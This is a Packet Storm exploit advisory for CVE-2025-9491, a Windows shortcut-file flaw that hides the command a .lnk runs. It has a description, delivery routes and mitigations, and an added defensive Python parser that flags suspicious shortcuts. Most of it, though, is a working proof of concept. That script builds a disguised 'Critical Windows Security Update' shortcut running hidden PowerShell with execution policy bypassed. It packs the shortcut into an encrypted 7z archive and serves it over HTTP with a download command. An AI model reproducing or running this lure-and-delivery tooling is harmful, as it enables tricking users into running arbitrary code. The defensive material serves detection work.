Microsoft Windows LNK File UI Misrepresentation Remote Code Execution

08 Dec 2025 00:00:00 | Reported by nu11secur1ty | Type: packetstorm | Source: packetstorm.news | 175 views

Critical Windows LNK UI misrepresentation allows arbitrary code execution via malicious shortcut files.

# Title: Windows LNK File UI Misrepresentation Remote Code Execution
# Date: 2025-01-04
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (Windows OS component)
# Version: Windows 10, Windows 11, Windows Server 2016/2019/2022
# Tested on: Windows 10 22H2, Windows 11 23H2
# CVE: CVE-2025-9491
# CVSS: 8.8

### Description:
A critical vulnerability exists in Microsoft Windows LNK file handling that allows attackers to create malicious shortcut files that appear legitimate in Windows Explorer while executing arbitrary commands. The vulnerability is a UI misrepresentation flaw in which Windows displays the shortcut's file properties incorrectly, so the user sees the chosen icon and description rather than the command the shortcut runs.

### Exploit:
[href](https://raw.githubusercontent.com/nu11secur1ty/Windows11Exploits/refs/heads/main/2025/CVE-2025-9491/Exploit/CVE-2025-9491.py)

### Technical Details:
The vulnerability allows attackers to craft LNK files with:
1. Legitimate-looking icons (document, PDF, Windows Update shield)
2. Misleading descriptions ("Security Update", "Important Document")
3. Hidden command execution in the arguments field
4. Window state set to hidden (SW_SHOWMINNOACTIVE = 7)

When a user opens the malicious LNK file, Windows Explorer shows it as a harmless document, but the file actually executes commands with the user's privileges. No security warnings are displayed to the user.

### Proof of Concept:
An LNK file can be created that:
- Shows as "Windows Security Update" with a shield icon
- Actually executes: cmd.exe /c powershell -Command "malicious_payload"
- Runs with a hidden window (WindowStyle = 7)
### Delivery:
The LNK file can be delivered via:
1. Email attachments
2. Network shares
3. Web downloads
4. USB devices
5. Compressed archives

### Impact:
- Remote Code Execution with user privileges
- No user warnings or security prompts
- Complete UI deception
- Easy to weaponize

### Mitigation:
1. Enable display of file extensions in Windows Explorer
2. Block .LNK file attachments at email gateways
3. Implement application control (AppLocker, WDAC)
4. Monitor for hidden process execution
5. User education about suspicious files
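As an added example (not part of the advisory or nu11secur1ty's PoC), the following dependency-free triage helper parses the MS-SHLLINK header and StringData fields a lure like this relies on and flags the combination described above: a hidden window (ShowCommand 7), a script-host target, inline command arguments, and an icon borrowed from a system DLL. The script-host and argument token lists, the ANSI code page, and the constructed sample shortcut are assumptions.

```python
import struct
# Added triage helper (not the advisory's code); script-host and argument lists are assumptions.
HEADER_SIZE, SW_SHOWMINNOACTIVE = 0x4C, 7   # header size; ShowCommand the PoC sets via WindowStyle = 7
HAS_IDLIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80        # LinkFlags bits (MS-SHLLINK 2.1.1)
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))  # HasName..HasIconLocation, in file order
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_ARGS = ("-executionpolicy bypass", "-command", "-enc", "-windowstyle hidden", "/c ")

def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields of a raw .lnk; IDList and LinkInfo are skipped."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out, pos = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}, HEADER_SIZE
    if flags & HAS_IDLIST:        # LinkTargetIDList: 2-byte size followed by the ItemIDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:     # LinkInfo: its first dword is the whole structure's size
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for bit, key in STRING_FIELDS:
        if flags & bit:           # each string is a char count followed by the characters
            count = struct.unpack_from("<H", data, pos)[0]
            out[key] = data[pos + 2:pos + 2 + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return out

def triage_lnk(data: bytes) -> list:
    """List why a shortcut matches the lure pattern; an empty list means nothing was flagged."""
    f = parse_lnk(data)
    target = f.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args, icon = f.get("arguments", "").lower(), f.get("icon_location", "").lower()
    reasons = []
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window hidden (ShowCommand=7)")
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    if any(tok in args for tok in SUSPICIOUS_ARGS):
        reasons.append("arguments carry an inline command")
    if target in SCRIPT_HOSTS and icon and not icon.split(",")[0].endswith(target):
        reasons.append(f"icon borrowed from another binary: {icon}")
    return reasons

def build_sample_lnk(rel_path: str, args: str, icon: str, show_cmd: int, name: str = "") -> bytes:
    """Constructed fixture (header + StringData only) so the parser can be exercised offline."""
    def s(t): return struct.pack("<H", len(t)) + t.encode("utf-16-le")   # CountCharacters + UTF-16LE
    clsid = bytes.fromhex("0114020000000000c000000000000046")    # {00021401-0000-0000-C000-000000000046}
    header = struct.pack("<I16sII", HEADER_SIZE, clsid, 0x04 | 0x08 | 0x20 | 0x40 | IS_UNICODE, 0)
    header += b"\0" * 24 + struct.pack("<IiIHHII", 0, 0, show_cmd, 0, 0, 0, 0)  # times, size, icon idx, ShowCommand, reserved
    return header + s(name) + s(rel_path) + s(args) + s(icon)
```

Run `triage_lnk(open(path, "rb").read())` over a quarantined sample; a real shortcut with an IDList or LinkInfo block is skipped over, so only the string fields and ShowCommand are inspected.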

### Vendor Status:
Microsoft has been notified. No patch available as of 2025-01-04.

References:
- CVE-2025-9491
- Microsoft Security Response Center

Note: This information is for defensive purposes only.
Unauthorized testing against systems you don't own is illegal.

--

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
    
--- proof of concept ---

```python
#!/usr/bin/python
# nu11secur1ty 2025
import os
import sys
import subprocess
import socket
import threading
import time
from http.server import HTTPServer, BaseHTTPRequestHandler

# pywin32 only exists on Windows; defer the failure so main() can print a usable hint
try:
    import pythoncom  # noqa: F401 - COM runtime, loaded alongside win32com
    from win32com.client import Dispatch
except ImportError:
    Dispatch = None


def get_script_directory():
    """Directory of this script, or of the frozen executable."""
    if getattr(sys, 'frozen', False):
        return os.path.dirname(sys.executable)
    return os.path.dirname(os.path.abspath(__file__))


def get_local_ip():
    """Pick the local address that would route outward; a UDP connect() sends no packet."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('8.8.8.8', 80))
        ip = s.getsockname()[0]
    except OSError:
        ip = '0.0.0.0'
    finally:
        s.close()
    return ip


def create_malicious_lnk():
    """Build the lure shortcut through the WScript.Shell COM object."""
    script_dir = get_script_directory()
    lnk_path = os.path.join(script_dir, 'Critical_Update.lnk')

    print("[*] Creating malicious LNK file...")

    try:
        shell = Dispatch('WScript.Shell')
        shortcut = shell.CreateShortCut(lnk_path)

        # What actually runs when the shortcut is opened
        shortcut.TargetPath = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"'

        shortcut.WorkingDirectory = r'C:\Windows\System32'
        # Description shown by Explorer in the tooltip and properties dialog
        shortcut.Description = 'Critical Windows Security Update - KB5029244'

        # Icon taken from a system DLL (the "legitimate-looking icon" from the advisory)
        icon_paths = [
            r'C:\Windows\System32\shell32.dll',
            r'C:\Windows\System32\imageres.dll',
        ]

        for icon_path in icon_paths:
            if os.path.exists(icon_path):
                shortcut.IconLocation = f'{icon_path},78'
                break

        shortcut.WindowStyle = 7  # SW_SHOWMINNOACTIVE: starts minimised without taking focus
        shortcut.Save()

        if os.path.exists(lnk_path):
            print(f"[+] LNK created: {lnk_path}")
            return lnk_path
        return None

    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def compress_with_7zip(lnk_path, password=None):
    """Wrap the shortcut in a 7z archive, optionally password-protected."""
    if not lnk_path or not os.path.exists(lnk_path):
        print("[-] LNK file not found")
        return None

    seven_zip_paths = [
        r'C:\Program Files\7-Zip\7z.exe',
        r'C:\Program Files (x86)\7-Zip\7z.exe',
        '7z.exe',
        '7z'
    ]

    seven_zip = None
    for path in seven_zip_paths:
        try:
            result = subprocess.run([path, '--help'], capture_output=True, text=True)
            if result.returncode == 0:
                seven_zip = path
                break
        except OSError:
            continue

    if not seven_zip:
        print("[-] 7-Zip not found")
        return None

    archive_name = os.path.join(get_script_directory(), 'update.7z')

    cmd = [seven_zip, 'a', archive_name, lnk_path]

    if password:
        cmd.append('-p' + password)

    # -mhe=on also encrypts the archive's file list when a password is set
    cmd.extend(['-mx9', '-mhe=on', '-t7z'])

    print("[*] Compressing with 7-Zip...")

    try:
        result = subprocess.run(cmd, capture_output=True, text=True)

        if result.returncode == 0:
            print(f"[+] Archive created: {archive_name}")
            if password:
                print(f"[+] Password: {password}")
            return archive_name
        print(f"[-] 7-Zip exited with code {result.returncode}: {result.stderr.strip()}")
        return None

    except Exception as e:
        print(f"[-] Compression failed: {e}")
        return None


class FileHandler(BaseHTTPRequestHandler):
    """Serve update.7z from the script directory, independent of the current working directory."""

    def do_GET(self):
        if self.path == '/' or self.path == '/update.7z':
            file_path = os.path.join(get_script_directory(), 'update.7z')

            if os.path.exists(file_path):
                self.send_response(200)
                self.send_header('Content-type', 'application/x-7z-compressed')
                self.send_header('Content-Disposition', 'attachment; filename="update.7z"')

                with open(file_path, 'rb') as f:
                    content = f.read()

                self.send_header('Content-Length', str(len(content)))
                self.end_headers()
                self.wfile.write(content)
                print(f"[+] CVE-2025-9491: Malicious LNK served to {self.client_address[0]}")
            else:
                self.send_error(404)
        else:
            self.send_error(404)

    def log_message(self, format, *args):
        # Silence the default per-request access log
        pass


def start_server(port=8080):
    ip = get_local_ip()

    print(f"[+] Starting server on http://{ip}:{port}")
    print(f"[+] Download URL: http://{ip}:{port}/update.7z")
    print("[+] Server running...")

    server = HTTPServer((ip, port), FileHandler)
    server.serve_forever()


def main():
    print("=" * 60)
    print("CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server")
    print("=" * 60)

    if Dispatch is None:
        print("[-] Install pywin32: pip install pywin32")
        return

    # Create LNK
    lnk_file = create_malicious_lnk()
    if not lnk_file:
        print("[-] Failed to create LNK")
        return

    # Compress with 7-Zip
    print("\n[*] Compress with 7-Zip? (y/n): ", end='')
    compress = input().lower().strip()

    if compress == 'y':
        print("[*] Password (optional): ", end='')
        password = input().strip()
        if not password:
            password = None

        archive = compress_with_7zip(lnk_file, password)

        if archive:
            print(f"\n[+] Archive ready: {archive}")

            # Start HTTP server in background thread
            server_thread = threading.Thread(target=start_server, daemon=True)
            server_thread.start()

            ip = get_local_ip()
            print(f"\n[+] Server started at http://{ip}:8080")
            print(f"[+] Download: http://{ip}:8080/update.7z")
            print("\n[+] PowerShell download command:")
            print(f'    iwr http://{ip}:8080/update.7z -OutFile update.7z')

            # Keep main thread alive
            try:
                while True:
                    time.sleep(1)
            except KeyboardInterrupt:
                print("\n[*] Shutting down...")
        else:
            print("[-] Compression failed")
            print(f"[*] Use raw LNK: {lnk_file}")
    else:
        print(f"\n[*] Raw LNK file: {lnk_file}")


if __name__ == "__main__":
    main()
```

Scores (as of 08 Dec 2025): Vulners AI Score 7 (High risk); CVSS 3.1: 3.3 - 7.8; CVSS 4: 4.6; CVSS 3: 7; EPSS: 0.00912